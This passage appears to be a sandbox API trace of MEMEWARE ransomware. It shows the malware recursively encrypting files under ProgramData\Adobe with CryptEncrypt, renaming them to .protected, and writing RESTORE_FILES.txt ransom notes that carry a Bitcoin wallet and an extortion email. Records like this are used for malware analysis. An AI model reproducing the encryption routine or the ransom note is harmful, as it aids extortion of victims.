lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ea24*=0x1df, lpOverlapped=0x0) returned 1 [0064.689] SetFilePointerEx 
(in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0064.689] CloseHandle (hObject=0x14c) returned 1 [0064.690] wnsprintfW (in: pszDest=0x4e2bc8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected") returned 87 [0064.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.protected" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.protected")) returned 1 [0064.690] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0064.690] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0064.690] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt") returned 74 [0064.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0064.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.691] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0064.692] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.692] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0064.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.692] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0064.692] CloseHandle (hObject=0xd8) returned 1 [0064.692] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0064.692] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0064.692] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt") returned 65 [0064.692] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\RESTORE_FILES.txt" (normalized: 
"c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.692] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.692] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0064.694] lstrlenA 
(lpString="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") returned 684 [0064.694] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0064.694] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.694] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0064.699] CloseHandle (hObject=0xd4) returned 1 [0064.699] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0064.699] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0064.699] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 55 [0064.699] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0064.700] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.700] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0064.701] lstrlenA (lpString="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") returned 684 [0064.701] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0064.701] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.701] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0064.701] CloseHandle (hObject=0xb4) returned 1 [0064.701] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.701] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0064.702] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 50 [0064.702] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.702] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.702] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.702] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.703] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.703] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0064.703] CloseHandle (hObject=0xa4) returned 1 [0064.703] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Windows") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Program Files") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="Program Files (x86)") returned -1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="$Recycle.bin") returned 1 [0064.703] lstrcmpiW (lpString1="ARM", lpString2="System Volume Information") returned -1 [0064.703] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM") returned 28 [0064.703] lstrcmpW (lpString1="ARM", lpString2=".") returned 1 [0064.703] lstrcmpW (lpString1="ARM", lpString2="..") returned 1 [0064.703] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*") returned 30 [0064.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0064.703] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.703] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.703] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0064.703] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.703] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\.") returned 30 [0064.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.704] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\..") returned 31 [0064.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.704] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Windows") returned -1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="Program Files (x86)") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="$Recycle.bin") returned 1 [0064.704] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="System Volume Information") returned -1 [0064.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0") returned 42 [0064.704] lstrcmpW (lpString1="Reader_10.0.0", lpString2=".") returned 1 
[0064.704] lstrcmpW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0064.704] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*") returned 44 [0064.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0064.734] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.734] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.734] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.734] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\.") returned 44 [0064.734] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.734] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\..") returned 45 [0064.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.735] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", 
lpString2="Windows") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="Program Files") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="Program Files (x86)") returned -1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="$Recycle.bin") returned 1 [0064.735] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="System Volume Information") returned -1 [0064.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.735] StrStrIW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".protected") returned 0x0 [0064.735] lstrcmpW (lpString1="AdbeRdrSecUpd10111.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0064.735] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".txt") returned 0x0 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 [0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".rar") returned 0x0 [0064.736] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 65 
[0064.736] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".zip") returned 0x0 [0064.736] ReadFile (in: hFile=0xd4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.738] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.738] WriteFile (in: hFile=0xd4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0064.739] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.739] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0064.739] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0064.739] CloseHandle (hObject=0xd4) returned 1 [0064.740] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected") returned 75 [0064.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.protected" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.protected")) returned 1 [0064.740] FindNextFileW (in: 
hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Windows") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Program Files") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="Program Files (x86)") returned -1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="$Recycle.bin") returned 1 [0064.741] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="System Volume Information") returned -1 [0064.741] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 66 [0064.741] StrStrIW (lpFirst="AdbeRdrUpd10110_MUI.msp", lpSrch=".protected") returned 0x0 [0064.741] lstrcmpW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="RESTORE_FILES.txt") returned -1 [0064.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0064.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, 